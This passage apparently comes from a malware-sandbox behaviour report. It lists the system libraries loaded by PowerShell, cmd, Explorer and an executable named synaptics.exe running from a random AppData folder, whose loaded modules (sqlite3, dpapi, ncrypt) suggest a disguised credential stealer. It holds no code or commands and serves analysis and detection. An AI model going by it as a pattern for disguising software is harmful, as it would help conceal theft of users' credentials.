                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: python310.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: libcrypto-1_1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: libssl-1_1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: sqlite3.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: libffi-7.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: pywintypes310.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: python310.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: vcruntime140.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: libcrypto-1_1.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: libssl-1_1.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: sqlite3.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: libffi-7.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: pywintypes310.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: dpapi.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: ninput.dll
                Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
                Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                Source: C:\Windows\explorer.exeSection loaded: ninput.dll
                Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
                Source: C:\Windows\explorer.exeSection loaded: apphelp.dll
                Source: C:\Windows\explorer.exeSection loaded: profapi.dll
                Source: C:\Windows\explorer.exeSection loaded: linkinfo.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\explorer.exeSection loaded: edputil.dll
                Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dll
                Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
                Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
                Source: C:\Windows\explorer.exeSection loaded: appresolver.dll
                Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\explorer.exeSection loaded: slc.dll
                Source: C:\Windows\explorer.exeSection loaded: sppc.dll
                Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
                Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\explorer.exeSection loaded: pcacli.dll
                Source: C:\Windows\explorer.exeSection loaded: mpr.dll
                Source: C:\Windows\explorer.exeSection loaded: sfc_os.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: python310.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: vcruntime140.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: vcruntime140.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: libcrypto-1_1.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: libssl-1_1.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: sqlite3.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: libffi-7.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: pywintypes310.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: ntasn1.dll
